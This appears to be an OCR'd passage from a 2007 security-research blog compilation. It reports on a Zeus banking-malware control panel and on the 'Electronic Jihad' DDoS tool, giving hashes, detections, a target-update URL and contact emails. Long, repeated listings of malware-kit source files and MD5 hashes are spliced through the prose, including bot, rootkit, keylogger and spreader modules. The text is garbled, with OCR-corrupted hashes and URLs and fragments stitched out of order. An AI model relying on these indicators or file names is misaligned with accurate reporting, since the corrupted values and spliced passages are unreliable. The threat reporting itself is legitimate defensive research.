netstatp.cpp 
820e8648707f632b3d90f9f3ab22e0db 
netstatp.h 
1ce3bb0d2241980dc247ceb1b14768e4 
netutils.cpp 
7830f76b77cbdd0ba87344e491afd317 
netutils.h 
d9f9bd3a26e840e4c54477cbecb2247d 
passwd.h a64a53096b26140f039f7cd09e8510d7 
pnp.cpp 
765e08al1d39b6eae030flaef4c479238 
pnp.h 
0d164366352a45fed1ld5baaada0bce02 
processes.cpp 
4a345dd631db41ladbf016219bfd07bf6 
processes.h 
d648e2988a7cbd350564502a8e80f30b 
protocol.cpp 
74f42a7dc29c86872a6b169549cf9alb 
protocol.h 
341a39ceb14f519cd0601f383b292dd8 
pstore.cpp 
279b6d2658f175e185ac84f27d83a541a 
pstore.h 9f6785ef830bb25955f2609adf24ab11 
redirect.cpp 
1d3480013ca7ddc71715c081c7fe9d29 
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question is that the script kiddies behind it forgot to take care of their directory permissions 
just like the Russian Business Network did recently, and while in [12]RBN’s case over 100 
malwares were spotted, in this case it’s a web C &C for a metaphisher type of banking malware 
kit, namely Zeus. It gets even more interesting, as it appears that a Turkish defacer like the 
ones [13]l blogged about yesterday is somehow connected with the group behind the recent 
Possibility Media’s Attack, and the Syrian Embassy Hack as some of his IFRAMES are using 
the exact urls in the previous attacks. And you you already know while reading my previous 
assessments and the connections between them, one of the attack IP’s in the Possibility 
Media’s malware attack was also among the ones used in the Bank of India hack - it’s the "ai 
siktir vee?" group with another unique IP. 


Key points : 


- a Turkish defacer is taking advantage of an remotely installed web backdoor in order 
to host a metaphisher type of banking malware kit 

- the defacer is embedding iframes that were used in the Bank of India hack, the Syrian 
Embassy hack, and the recent Possibility Media’s malware attack 

- if defacers start cooperating with malware groups given each of them excels at different 
practices, it’s gonna get very ugly 


If you don’t take care of your site’s web vulnerability management, someone else will. 


1. http: //ddanchev. blogspot .com/2007/10/russian-business-network. htm 
2. http://seclists.org/fulldisclosure/2007/O0ct/0892.htm 


3. http: //209.85.135.104/search?hl=en&g=cache/3Ahttp%3A%2F ,2Fnewsland. ru/,2FNews/;2FDetail/,2F id/2F 10584472 

4. bhttp://1.bp.blogspot .com/_wICHhTiQmrA/RzDvTxqTUNI/AAAAAAAABEY /oPgf iWuY1NQ/s1600-h/podfeed_iframe_coverup_ 
5. neep://groupe. google. con/group/stopbaavare/</STASTAT aZE41568 

6. http: //ise. sans.org/diary.phptstoryid-3621 

7. http: //ddanchev . blogspot . com/2007/08/bank- of - india-serving-malware html 


8. http: //ddanchev. blogspot .com/2007/10/possibility-medias-malware-fiasco.htm 


9. http: //ddanchev. blogspot .com/2007/11/detecting-and-blocking-russian- business. htm 


10. 
12, 
13, 
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redirect.h 
8f1f0e837904818efcfdf14f1928f1e0 
regcontrol.cpp 
2fe90dd6cac60e88abca3ed83d424d6b 
regcontrol.h 
dbc9b0243d5f43cldad546b5e3bf1c80 


reptile.cpp 
c0c728766e7301c6aa3575c02fa6c9ea 
reptile.dep 
6fa3b86313e460467999c7bfb8c41f7e 
reptile.dsp 
8c0d7907fd2702b02e585cbf39c2550a 
reptile.dsw 
a7097dcfc065b5e433a8749ac55db41f 
reptile.h 
1e13d2301a263a27b82bf5f0fbae35d7 
reptile.mak 
eba2043ee1f3199923304e711cc2dal10 
reptile.ncb 
0418417792d1c03fe8b860858a753069 
reptile.opt 
08359868d8528647179c7c562b83da63 
reptile.plg 
9292e7e2c3f6149bc343638c44278f97 
reptile.sin 
90bf17a33618855383b5e5a6adfaf357 
reptile.suo 


697d1lcb2be6edab175cf56ffe7206ba2 
reptile. vcproj 
f320c52e237ada5286488b3b4cf6cdfa 
reptilepass.txt 
ae0f936ada915314beae4cb1656ae3dd 
secure.cpp 
b33e86824916d682df59d7df5ab35b03 
secure.h 3e5e€65e967be2469a4544b29c9e41654 
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service.cpp 
4395519fbd3d301f873c386bec2da638 
service.h 
792e15803e093c9fc96cafaabe7aea20 
sniffer.cpp 
2b40bbb810d2f62c42558f84da8e1c90 
sniffer.h 
4ef5ae8e0dc1047966d5ede7ead4ff5a 
socks4.cpp 
535622e9a3898elc7adc64e3d787168d 
socks4.h fc7e5609a8c08736a10fb15738755a5d 
speedtest.cpp 
9b927276e0f042cb3c471daedd02dfc5 
speedtest.h 
7afb2905c5a83055e7ce59520e2451c0 
strings.h 
13cc2e46c8a3dd6ad154b13a518822b9 
stub.exe 5d9e0094c47b9de4473bea1d966c4f96 
svchost.cpp 
6955b9e7e96f4edfa70463f838d0a2d8 
svchost.h 
49fe28536804b16/7fffaa5e5df7ficed 
tcpip.h 
3b1014de227e11ffe78ba38aa0678326 
thcsql.cpp 
a061835d7679a51bba663b2a4f4e6c52 
thcsql.h 09a759a5deb484aaa4bd0f792a239a01 
threads.cpp 
6df12801909bb276ebe64394a0a33be2 
threads.h 
2926c6cb286cb5d401ccb4947aa6ec61 
utility.cpp 
ae95f0056e4f533c72cc42b1d26b767d 
utility.h 
8bae67fec2e4cc271e50d9052c6e6724 
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vscan.cpp 
ea43fab3996a246af9db6ff42e3dc904 
vscan.h 
548a2a96dc5af54b7eeb20527c511a3e 
vscandef.h 
3b865cc81cc3ec8533e269e0dbd2090a 
wins.cpp 3ff6c21878d0357d1763b5345478e972 
wins.h 
a9a720198a6ff01d382f4cff17a8e429 
wkssvc.cpp 
f559be6c88e2083d7295af94e54aecc4 
wkssvc.h 67b56da4edd9ae6caa47ffl1d9e530fd6 
Driver.cpp 
da597ef704450dc6904423517235ef90 
Driver.dsp 

1f7 e4ff782992330e6ed605d6b8acfbf 
Driver.dsw 
846ff40dec86f0d4dd4692dd0e3d7e3f 
Driver.h 7404062b35f7bd208c655743a0244550 
Driver.ncb 
79ed9635dcd429b20560006363a38725 
ioctlcmd.h 
278822516d1890ad95db1872d6626efc 
Jiurl PortHide.cpp 
cfa49de552c06a8dda5fca38f35ab4le 
Jiurl _PortHide.h 
3e0d1188486e85ce18678cea28066cd0 
Jiurl tcpioctl.h 
3a7eba644b780e2a0f80a2ef84a4d5e3 
ProcessName.c 
cleabda9fe46de0f319ab6d9e9FF7399 
ProcessName.h 
f9151b283bf37ae51fd410fdacd8a962 
Rootkit.cpp 
24dceblacff18fc6a3ba90895450677b 
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Rootkit.h 
020c7d2c685ecf554c32ed643bcc8c8e 
encrypt.exe 
7d400a514eebececabc78541fe5cb5e4 
reptile.txt 
9d4b0252138c69c59720d95f9ec121f7 
asn1.h 
2bae81693ebf68e23f3ad3f3021889be 
asnl1_mac.h 
7e10de898ecd175a61la0dbfb12185c2a 
bio.h 
ce7243ecaa4b719218elbf752adfObed 
blowfish.h 
d49e3298bc64a6e465ed7718f564d8af 
bn.h 
b37a3ef0588ce34e0c63a5274aa44961 
buffer.h 356a812a4ffc0968b57ac95e7a63ab78 
cast.h 
96116e52361c2d0300342bfb6903a3bd 
comp.h 
0c90612a2a019eaef34bdbcc66a021b8 
conf.h 
38754a66c81b8f8b8590ed04b78d161d 
conf _api.h 
844d6a3830cb086ca59f131b1484d44b 
crypto.h 3bb8443f7f07e9234e96ec9579f090d0 
des.h 
0d6c580e72b14b714df7ae5f5318fb3f 
dh.h 
f9a01c2ca0be5ead86ea26fd6574c2b4 
dsa.h 
665bdb1458242049a166edf3acd7170b 
dso.h 
4071b80cdab58b3fceaa958cOccdce46 
ebcdic.h b39613d8ce01e224ae72baa0246892e7 
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engine.h 9834177eba2e98bd0f5381e74c2d3d5f 
err.h 
e9fa3cc5d24d8f10e18490856f4da054 
evp.h 
620990a191df1ca247387f09c06f3b3c 
e _os.h 
62fbb35194165d3a5cb3d10e75aaa818 
e _os2.h 
784f6a58114c353b8e6f3a7787065cf3 
hmac.h 
b660alb6e6d396efcbdcf6412e93cb93 
idea.h 
fdc6d4d55fed4dbbf381e80ab275318b 
lhash.h 
5d5084cdce6d7bc60dc400f7d4faaccf 
md2.h 
4bf98d5033c334181483471c86e38267 
md4.h 
37af532a0408e1f9dd470374c52aeb87 
md5.h 
32c0cc65f2d457e9c0302b6e14233424 
mdc2.h 
2d9994df4b22705c60dd3f4bf242a7cl 
objects.h 
4187608d042df711837945991109f9fc 
obj _mac.h 
2e39e6bffb05ddbadb58aedc947f741f 
openssiconf.h 
1356dbc2305c7ba93decedla3e45alc2 
opensslv.h 
83a195ad2b394633f9d8ec69631a51ac 
pem.h 
c679bc0909305501723b0badf24c02be 
pem2.h 
2aee9bcf129f9962f3afaed608385850 
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pkcs12.h 779cf7c87331535dfd5bf69a97b2fb3d 
pkcs7.h 
0d668a62e9c4a7c6ab6d9eb61f6e5c685 
rand.h 

27d59b95a7eba54a99fd862039f4dff0 

rc2.h 

0d488e28bb20ff3788fe8c52133d1cfb 

rc4.h 

1c5b8415fc3cecfcc6a5359eccbd5dbd 

rc5.h 

94932666f36526419623555f90ab050a 
ripemd.h 350da6b77dcb285c59c78ce7671d2873 
rsa.h 

fd6cc4c4072d3b43ba8c8d62cca229bc 
rsaref.h 58fd3f7f75cb5841387a529b888eff7b 
safestack.h 
a4174efaacdbdcb936dea701193bc8f3 

sha.h 

d35627cd8cef90002563554a8d891c84 

ssl.h 

73ef4c68b58632f2f2b55e750b7ee06d 

ssl2.h 
ddce87b1la7e4af3aa35ca8a665db6eb0 
ssl23.h 
71ae764cc97086829353194e4d9ff2e9 

ssl3.h 

e04e9f4f267129548c0e59fb144cd9bb 
stack.h 
81e9f97755996e1711e81aac115a33bd 
symhacks.h 
736e542efdfc7d21535a6ff8b3c03a45 

tls1.h 
d1c9de5aad2c0490825c2e1885a7e098 
tmdiff.h 8b6b6f8df660f682d29b153cfe760674 
txt _db.h 
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730e334f531c6a0ac0ae95e252c53f64 
x509.h 
3d93e919f45a81357b4b97dfa0f84155 


x509v3.h 81671fe50ed0f46bd427efbe1387844d 


x509 _vfy.h 
a1954b5542b923971a40f046cbd4celc 
libeay32.lib 
31d145ada2de7ee054f490e958aab61d5 
libeay32D.lib 
fc2f69ad8302664ba1780aadc8507759 
ssleay32.lib 
2d28bcdb0ec035da5c5fc716e1653d53 
ssleay32D.lib 
2ef69db57b73874ed9fa37b06be5cbc6 
buf.txt 
08957cd9ad643ac8455b0cfb33720ded 


icon.ico 76685dfa5860561a421b7acc5f5c37fb 


resource.h 
f2f1500e77505ed3fcbe126c72ad8d29 
pstorec.tlh 
48ad50888b7576e0d6b2832efaal3263 
pstorec.tli 
5509987709d64118951b49ffa609cf86 
remove.cpp 
bec30fa04730b0e8f3dc5b9b3bf49bca 
remove.dsp 
224a1dadc892b4c2f45272926f3d100c 
remove.dsw 
6c87112017aad0a5ce8acaa25d6806c5 
remove.ncb 
3e6ee0d5ae27cfddfff0f9bb6617db13 
advscan.cpp 
99c9ce19ccb250ec5e69135838955443 
advscan.h 
5c5f7fo1lb7ed612771lab2bdcOlab9f9b 
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asn.cpp 
b95bd20efff49b927dal6e213f438749 

asn.h 

b9321a4d186254af897035566e86e114 
banner.cpp 
le2bdef556281404cc9a3321aa7a407c 
banner.h f27746db68f05c719251ladba69d0c4bb 
commands.cpp 
24b6422882b662bafb998d0a9c27e753 
commands.h 
89040fed6a3832f75a4b978ee0ffb4d1 
configs.h 
89cd55d462da8b9dfé6f26f3aca702fa6 
crypt.cpp 
f03cca9691dd9ad588e4287524021c3e 

crypt.h 
c2edef9177543e1b8a8611d347d99b66 
dcom.cpp af90ccde9f7bbcaef92e9d6abee25af3 
dcom.h 
1515fd93ad7196026d7679f5b478alab 
defines.h 
9f4f6311bddb85b43564fc5c5ac0466b 
download.cpp 
2b17d55de73f19dfa454d78dd579a966 
download.h 
d9157dc8f81483e56884f62a6473d717 
driveinfo.cpp 
87a2e732800aa01820b0aee958cc8b03 
driveinfo.h 
0e463578110edb7511798fbb69827 Off 
externs.h 
67adfb72efa5b95b8bd0144a86cc5e74 
fphost.cpp 
adf7db95bd67da6577c0aaa469737f5f 
fphost.h eff3d1ba2e46287f3b0d01571aa2ac73 
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ftpd.cpp e06bcc127636ebf60b6ed52bb321a617 
ftpd.h 
da4f3d35010ladb59be91cal6fec3be2 
fu.cpp 
4c12e14985891ba6e7fe1ld978ccf0756 
fu.h 
5ee58b9c18fe86d14654fe31c1793606 
fudll.h 
440e034c517d25b7039bcc1f86f064a3 
functions.h 
774de6ce4ddfc9ef4c0aaa9fcb3bd801 
includes.h 
0a1d9b209a062601a48de310f6939354 
info.cpp 948acaa3d8a91285e456fe727a9bfe00 
info.h 
70994ba4e7570710ddc3a4c91e494c22 
ioctlcmd.h 
278822516d1890ad95db1872d6626efc 
irc.cpp 
b48114a264d5b2fe27b00bb0fc819bbb 
irc.h 
1261d7930e35b8c5254d204315f6ca81 
keylog.cpp 
a6d6a69e440864e350e9d13f5b5db023 
loaddlls.cpp 
bfbfe5f78f429b3898a9100d7ad2bfd3 
loaddlls.h 
8f0c2c63112210df17b3d53262ca7839 
Isass.cpp 
4615f57239b16915f7f24594c2fe7de7 
Isass.h 
8d3db94c754b7422e35ed423204b902b 
mssql.cpp 
bb15434cef41ca090a95a39c444d92c5 
mssql.h 


11601 


700d257c41a1d9ec1e4795c940a7bace 
netbios.cpp 
fd3958d6elaf752889a20d6be38e6f01 
netbios.h 
10a1535d311b113b8702f6789d1ad1b3 
netdde.cpp 
ea06c222b3cf4fd73aced46b38f64097 
netdde.h 717faalb591f7b9e0dbca80c3393ac6f 
netstatp.cpp 
820e8648707f632b3d90f9f3ab22e0db 
netstatp.h 
1ce3bb0d2241980dc247ceb1b14768e4 
netutils.cpp 
7830f76b77cbdd0ba87344e491afd317 
netutils.h 
d9f9bd3a26e840e4c54477cbecb2247d 
passwd.h a64a53096b26140f039f7cd09e8510d7 
pnp.cpp 
765e08ald39b6eae030flaef4c479238 
pnp.h 
0d164366352a45fed1ld5baaada0bce02 
processes.cpp 
4a345dd631db41ladbf016219bfd07bf6 
processes.h 
d648e2988a7cbd350564502a8e80f30b 
protocol.cpp 
74f42a7dc29c86872a6b169549cf9alb 
protocol.h 
341a39ceb14f519cd0601f383b292dd8 
pstore.cpp 
279bd2658f175e185ac84f27d83a541a 
pstore.h 9f6785ef830bb25955f2609adf24ab11 
redirect.cpp 
1d3480013ca7ddc71715c081c7fe9d29 
redirect.h 

11602 


3.11.8 Electronic Jihad v3.0 - What Cyber Jihad Isn’t (2007-11-07 14:38) 
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It’s intergalactic security statements like these [1]that provoked me to do my most insightful 
research into the topic of [2]what is cyber jihad, or [3]what cyber jihad isn’t. The news item 
on cyber jihadists coordinating a massive DDoS attack is a cyclical one, namely it reappears 
every quarter as it happened in August, and so [4]l reviewed the tool, provided screenshots, 
and commented that while it’s an aspirational initiative, with thankfully lame execution, it’s not 
the coordinated DDoS attack executed in such way that should be feared, but cyber jihadists 
outsourcing the process. Despite that absolutely nothing has changed in respect to the way the 
program operates since v2.0, except that al-jinan.org changed to the now down al-jinan.net, 
the web is buzzing about the plans of wannabe cyber jihadists, the Al Ansar Hacking Team to 
be precise, to DDoS infidel sites on the 11th of November. Boo! Spooky - [5]Al Qaeda cyber- 
jihad to begin Nov. 11; [6]The e-Jihadists are coming, the e-Jihadists are coming!; [7]Report: 
Al Qaeda to Launch Cyber-Attack on Nov. 11; [8]Al-Qaeda Planning Cyber Attack?. 

Key points : 

- despite that the recommended DoS tool itself in the previous post is detected by almost all 
the anti virus vendors, in a [9]people’s information warfare situation, the participants will on 
purposely turn off their AVs to be able to use it 

- the Electronic Jihad program is an example of poorly coded one, poorly in the sense of obtain- 
ing lists of the sites to be attacked from a single location, so you have a situation with 1000 
wannabe cyber jihadists not being able to attack anyone in a coordinated manner given the 
host gets shut down 

- the central update locations at the al-jinan.net domain are down, [10]thank you Warintel, 
and so are the several others included, so you have a situation where forums and people start 
recommending the tool, they obtained it before the site was shut down, but couldn’t get the 
targets to be attacked list 


Time to assess the binary. The program archive’s fingerprints as originally distributed : 


File size: 358490 bytes 
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8f1f0e837904818efcfdf14f1928f1e0 
regcontrol.cpp 
2fe90dd6cac60e88abca3ed83d424d6b 
regcontrol.h 
dbc9b0243d5f43cldad546b5e3bf1c80 
reptile.cpp 
c0c728766e7301c6aa3575c02fa6c9ea 
reptile.dsp 
8c0d7907fd2702b02e585cbf39c2550a 
reptile.dsw 
a7097dcfc065b5e433a8749ac55db41f 
reptile.h 
1e13d2301a263a27b82bf5f0fbae35d7 
secure.cpp 
b33e86824916d682df59d7df5ab35b03 
secure.h 3e5e€65e967be2469a4544b29c9e41654 
service.cpp 
4395519fbd3d301f873c386bec2da638 
service.h 
792e15803e093c9fc96cafaabe7aea20 
sniffer.cpp 
2b40bbb810d2f62c42558f84da8e1c90 
sniffer.h 
4ef5ae8e0dc1047966d5ede7ead4ff5a 
socks4.cpp 
535622e9a3898e1c7adc64e3d787168d 
socks4.h fc7e5609a8c08736a10fb15738755a5d 
speedtest.cpp 
9b927276e0f042cb3c471daedd02dfc5 
speedtest.h 
7afo2905c5a83055e7ce59520e2451c0 
strings.h 
13cc2e46c8a3dd6ad154b13a518822b9 
stub.exe 5d9e0094c47b9de4473beal1d966c4f96 


svchost.cpp 
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6955b9e7e96f4edfa70463f838d0a2d8 
svchost.h 

49fe28536804b16/7fffaa5e5df7ficed 

tcpip.h 

3b1014de227e11ffe78ba38aa0678326 
thcsql.cpp 
a061835d7679a51bba663b2a4f4e6c52 
thcsql.h 09a759a5deb484aaa4bd0f792a239a01 
threads.cpp 
6df12801909bb276ebe64394a0a33be2 
threads.h 
2926c6cb286cb5d401ccb4947aa6ec61 
utility.cpp 
ae95f0056e4f533c72cc42b1d26b767d 

utility.h 

8bae67fec2e4cc271e50d9052c6e6724 
vscan.cpp 
ea43fab3996a246af9db6ff42e3dc904 

vscan.h 

548a2a96dc5af54b7eeb20527c511a3e 
vscandef.h 
3b865cc81cc3ec8533e269e0dbd2090a 
wins.cpp 3ff6c21878d0357d1763b5345478e972 
wins.h 

a9a720198a6ff01d382f4cff17a8e429 
wkssvc.cpp 
f559be6c88e2083d7295af94e54aecc4 
wkssvc.h 67b56da4edd9ae6caa47ff1d9e530fd6 
Driver.cpp 
da597ef704450dc6904423517235ef90 
Driver.dsp 
1f7e4ff782992330e6ed605d6b8acfbf 
Driver.dsw 
846ff40dec86f0d4dd4692dd0e3d7e3f 

Driver.h 7404062b35f7bd208c655743a0244550 
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Driver.ncb 
79ed9635dcd429b20560006363a38725 
ioctlcmd.h 
278822516d1890ad95db1872d6626efc 
Jiurl PortHide.cpp 
cfa49de552c06a8dda5fca38f35ab4le 
Jiurl _PortHide.h 
3e0d1188486e85ce18678cea28066cd0 
Jiurl tcpioctl.h 
3a7eba644b780e2a0f80a2ef84a4d5e3 
ProcessName.c 
cleabda9fe46de0f319ab6d9e9FF7 399 
ProcessName.h 
f9151b283bf37ae51fd410fdacd8a962 
Rootkit.cpp 
24dceblacff18fc6a3ba90895450677b 
Rootkit.h 
020c7d2c685ecf554c32ed643bcc8c8e 
encrypt.exe 
7d400a514eebececabc78541fe5cb5e4 
reptile.txt 
9d4b0252138c69c59720d95f9ec121f7 
ELiRT.dcu 
72302f79b42b71b57a02ff79e595c273 
EliRT.pas 
614794e59acb38326c2c1ldd4b9b7ca51 
EliRT _OMF _B.obj 
a9471ed91e8d7a99100c36c143a1326d 
Isass2 _spreader.pas 
2954a889c41c8elc2edb44e36a7922e4 
Isass _const.pas 
268d58ebdcd20538c15bd9757e024018 
Ninja.ini 
08738db53a514752d0e6a09eb055f97a 
Readme.txt 
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547a6243855ea9a7974077e148b62158 
TempNinja.dpr 
8221205b03ccb36f5300d8b16830b1f1 
untBot.pas 
72ef39e133fefd1d103b4fa32c60183b 
untCrypt.pas 
ee736f76a87730ee80a20d47fdae46e0 
untFTPD.pas 
d7c7e6defd2f4d1789412blafdbe85dd 
untFunctions.pas 
8203falcc269a9da9fla3d00dal3b2ba 
untGlobalDeclare.pas 
7c0a8048309d9ca23b66cee8533e83aa 
untHoneyPot.pas 
13de318ce8f3da2cc28ba475b0338825 
untHTTPDownload.pas 
2c0ee230f09c691c6cOaec9bab7a28d1 
untNetbios.pas 
4ad7258e9457f0c2afe41fe86e357d03 
untOutputs.pas 
bdef9361b579d6e5d0ae8348d4c52e5f 
untRunOnClose.pas 
f429d36450bfb72d052b2fafb68f6ead 
untScanner.pas 
bee49b67a371af930fe98cb553a43e48 
untSockets.pas 
944ff16775cf1f630e28fecc2a18f751 
untTCPIPPatcher.pas 
d76e498dcc6989b76768c987¢c552279F 
untThreads.pas 
fff9eef901b3287a8f2c82bb24544eec 
uStrList.pas 
3b2df18c9855a548f12e10ccdf4cObb4 
asnl __spreader.pas 
56bc5f843a4e5d85a28c2089a8a6c528 
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exASN. ini 
44fba9c77205a3d2d4b04521337a6201 
exASN1.pas 
439ef0781da30b30c1859912864aecO0f 
exDCOM2.pas 
€189532294638535b06db933df56a6da 
exNetAPI.dcu 
b3ee21c37430122c33c4e985838340Ff4 
exNetApi.ini 
4bd10d5f7b946d0d781a60ee8cfc0188 
exNetAPI.pas 
fd75b2777ef66ba88e936b36bba52387 
exNetbios.dcu 
9ecf30c6be991b84a25f8f8b097529d1 
exNetbios.pas 
70e904fccb2eclcadc6f88c76cd9b295 
exPNP.dcu 
075a7a4723da8197e391239fbc2bd50e 
exPNP.pas 
85d47fe3959f4beadca0b68dafa4af7d 
exVNC.dcu 
73c5104d66ec816fd219d2814a242021 
exVNC.pas 
bal5ac8b1a42fb1a25b318eb9a318877 
upnp _spreader.dcu 
5c81a0dac5312c2cb6f8ca27066c99F4 
upnp _spreader.pas 
0383ec9a20b25352210177fb40c7ed29 
dork1.txt 
0b3b5dalc2e77d0018dba398638be41b 
dork10.txt 
3629e2c2f08b0122edd6b7d63ea30307 
dork11.txt 
fc319e98711aba7296d9c7e87d111b97 
dork2.txt 


11607 


181417bcf5764573031e5576d5175c96 
dork3.txt 
8c21f199f356432e5aebbdc42b839973 
dork4.txt 
ecee3672b11da0aa44db210756ce8eba 
dork5.txt 
874de4f621320f5242b642828cb8cf6ba 
dork6.txt 
5e4c4dd7986362db35374f32a033925e 
dork7.txt 
89db90eb007be517cf7f560ce26ef405 
dork8.txt 
e560a110d6f9d4019df83ff58f654738 
dork9.txt 
b0a733736f519bc473d84bdc829dc166 
RFI-SCAN.V2.ID.PRIVATE.txt 
d05ab6e19429c3a11374aae564e6171d 
RFI-SCAN.V2.PRIVATE.txt 
f2c0a2146bcf093add6f6ea4ce3b5aa7 
RFI-SCAN.V2.PRIVATE.txt. bak 
8ab0f723f194037bc765d56709024f98 
RFI-SCAN.V2.SHELL.PRIVATE.txt 
5d1dc716d4ed6cd54e8c56af06437d2d 
RFI-SCAN.V2.SPREAD.PRIVATE.txt 
6b06049c9ad5556b335fa53271b981d3 
build.cmd 
eb81804c8c4403f147be1a66b39268F4 
configs.h 
9d5274026688c029ead39fc13f27e9db 
jpg.ico 
0737b7da77e94cac76dc7f45ec55c33f 
MSNMessengerAPI.tlb 
e7802e3e938bff54cb2731cd3dc5a69c 
res.aps 
b7169ad8fec630f845ele7bd1cdf6b02 
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res.rc 
90e49b91cc71266477ffa2292481cfac 


ri0t.dsp e4e348fe738ac6e3341179910ab9a7ed 
ri0t.dsw 4dc49d4212e7aa4a6c64ad0471ec9e95 
ri0t.ncb 5b47d98bc17c4dfd63d6221a5e07f13f 
ri0t.opt ba850a7222046c9fb06c87cf270276ed 
ri0t.plg 088d61d2c3098a11b6e23bc6c1a0e284 


advscan.cpp 
cfd7c9c47279fcddbaee474a6ac4eb1b 
aliaslog.cpp 
cl1bb09659eaddf661b7fdc4bf68530a5 
autostart.cpp 
25b3f8f00cC217d72431002fd3f6d5691 
avirus.cpp 
2ef71c653599f1166ec460a74ab6a35a 
cdkeys.cpp 
61459ee5307739fe7032c400bd48ac7c 
commands.cpp 
0653448de9d4681c3c058373d3aac357 
connect.cpp 
a5bbb9f90d5daldf55c5c8179ebc35b1 
crc32.cpp 
1d4e89b59d89256753d0fae5bbdb42e0 
crypt.cpp 
cfb3b3f77f537096900ef19c566ec4e3 
dcom2.cpp 
6cf76bcac59f22965d641aa4eca357bd 
download.cpp 
10556cb6fbb9f48a624ee29328f523b6 
driveinfo.cpp 
9c243475be978d26856cc6635f86bb79 
ehandler.cpp 
9f9d7da3463d8f5691b9348cc3c06cla 
findfile.cpp 
b63d4a4e927fe5dcd6157ce32db8be94 
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firefox.cpp 
a68e8448502bd334cb4177f0becb9155 
fphost.cpp 
ef54a7e3eff16ce38d35a2c41028547f 
ftptransfer.cpp 
b31b4ac2c575e32dee5ff22480ce5caa 
httpd.cpp 
8f71342e40a32318e562df4a8834d5f8 
icmpflood.cpp 
654732a6b37e9fed07962d3a5cadd04a 
ident.cpp 
1d066366b42c0d8950e4a25315620a45 
inject.cpp 

irc send.cpp 
074f976a815abee9b2310dc3679eb0b6 
keylogger.cpp 
6165c6e0f5bb44f31b81e86985fd9056 
loaddlls.cpp 

18f13f885cff7 lbfle3a8cec3368dcd9 
Isarestrict.cpp 

misc.cpp 

f5a7cObf7 7a529c56a87407457368b20 
msn.cpp 
def7b0c3f7b281ca3b791382aeal4e54 
net.cpp 
dfee8405dd08db4e766d5200355ec960 
netutils.cpp 
3e735617ab015735d0fe70fc0ed9f52b 
peer2peer.cpp 
56480044d2ccfb73a705528b07f2910a 
persist.cpp 
5890c92b5701bac5173628e6734db242 
pingudp.cpp 
48648cf75ca3a629a651f9ca65a084e8 


processes.cpp 
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41229c6ac5d5df8339fab8387bc85035 
protocol.cpp 
7b4ef789a8d00565f76133d0f361bf33 
psniff.cpp 
6d349942fa0cef6bd9583cb60fada427 
pstore.cpp 
9290499894e53868960e65d20el1fle8f 
remotecmd.cpp 
126033e64c4072387887757827920244 
ridt.cpp 8135d005d29c4fba538b95e0ea54fb6d 
rndnick.cpp 
70c7cd17f80187a67e925101962773f8 
rootkit.cpp 
c2d20b4d8d23e30435f58fa215841c23 
sandbust.cpp 
b4e7da4814087371a5cae7f5839b9c8b 
secure.cpp 

session.cpp 
fcdf3elcldd61a1lcd9d443e05f92cd72 
shellcode.cpp 
640657f30fec7950060f13674b3fa171 
slimftp.cpp 
ac2913599b52a37c990e1ff69f6e5eb6 
startup.cpp 
834b0ded68dedd7d2f7ef9fdc0937499 
sysinfo.cpp 
60c55082c1925eec02006d679441d84b 
tftpd.cpp 
60952c3eb6ce97661e0c524f31ddcc5c 
threads.cpp 
1f93967e0742c4c4a9bf27d31b87cc90 
usb.cpp 
f59be64e7c5eb59d44b40c65129f536a 
visit.cpp 
888fef0b35db7ab7f5defa499def2bc8 
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vnc.cpp 
468df7caab5eac644fd767a615c72dfc 
wildcard.cpp 
6ble7c52ebccc540d3fc51clafdc08f5 
commands.txt 
€241423e363897558214e8f9ba788bc9 
features.txt 
6celda23906a2ddfc214bf4fcb16158e 
Instructions.txt 
be254b9d220a40fe275d4427e485ac03 
BIN2C.COM 
1399d96e3caeaf2ecfec61e50203c585 
bot2dll.dsp 
d14bcd3eca51b45afa91d2d4aa76b7d1 
bot2dll.dsw 
3b90db1ef40755a40ca7b63b2fb8a075 
build.cmd 
6785ad24b57453564fb27b471e47da89 
dil.cpp 
7288e8e2c14fdcaa4d90b01cd8dbf760 
ext.h 
f04f77d306b9996ea3e5f56e1b642bd3 
main.cpp 46038a39e159calal19ed6aa62d7c6c9e 
advscan.h 
b039c49c0063dac8fdc56a3a323bc05f 
aliaslog.h 
5d0f2e7154fd22a548f83a7129722062 
autostart.h 
5095d41452b5b046066ed3fcd68825a8 
avirus.h e55a156d28fde56a0bb05fc599dafecf 
capture.h 
1a27e95a9451b7b9fde4dd3labbe40c4 
cdkeys.h 10199c0132621d0f86774ae3ea965f6c 
commands.h 


909fd90271f84f32a2055ab9b0d0ab16 
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MD5: f38736dd16a5ef039dda940941bb2c0d 

SHA1: 769157c6d3fe0laeade73a2de71e54e792047455 
No AV detects this one. 

E-Jinad.exe as the main binary 

File size: 94208 bytes 

MD5: caf858af42c3ec55be0elcca7c86dde3 

SHAI1: f6lfde991bfcc6096fa1278315cad95b1028cb4b 
ClamAV - Flooder.VB-15 

Panda - Suspicious file 


Symantec - Hacktool.DoS 
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In a [11]people’s information warfare incident where the ones contributing bandwidth would 
on purposely shut down their AVs, does it really matter whether or not an perimeter defense 
solution detects it? It does from the perspective of wannabe cyber jihadists wanting to using 
their company’s bandwidth for the purposely, an environment in which they are hopefully not 
being able to shut down the AV, thus forwarding the responsibility for the participation in the 
attack to their companies. 


Al-jinan.org has been down since the Electronic Jihad Against Infidel Sites campaign became 
evident, the question is - where’s the current DDoS campaign site? A mirror of the first cam- 
paign is available here - al-ansar.virtue.nu. [12]Cached copy of al-jinan.net (202.71.104.200) 
is still available. Emails related to Al Ansar Hacking Group - the crusaders hell @ yahoo.com; 
the crusaders hell @ hotmail.com; al-ansar @ gooh.net Now the interesting part - where are 
Al-Jinan’s new target synchronization URLs, and did they actually diversified them given that 
Al-Jinan.net is now down courtesy of what looks like Warintel’s efforts? Partly. Here are the 
update URLs found within the binary : 


al-jinan.net/ntarg.php?notdoing=yes 
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connect.h 
0099f8f502f2b1b97ee1853dd90d3c6a 
crc32.h 
1a8e23e4a21ec424d7al4cb327b5c290 
crypt.h 
bcff5ddf7b367a7f2da8137eb8d10614 
d3des.c 
71e83b68e095b59f2d50deee79d73be7 
dcom2.h 
€9548b20f8d3d955969a8b515b426db4 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
374abcce35a287153f59d96494b37e4c 
download.h 
47df8bad1de6fc3cf52ecaf03686d460 
driveinfo.h 
db9ec52dc459830c2282a7dealac5443 
ehandler.h 
5b8843010a35dc8539da3cb7b45c8ae2 
externs.h 
12flabe0le7e4ab4c08d52abc2e7d32f 
findfile.h 
874184ff14c51e874c744d79e133408d 
firefox.h 
cec26e3dcaf682619cf6a35fd0c5651f 
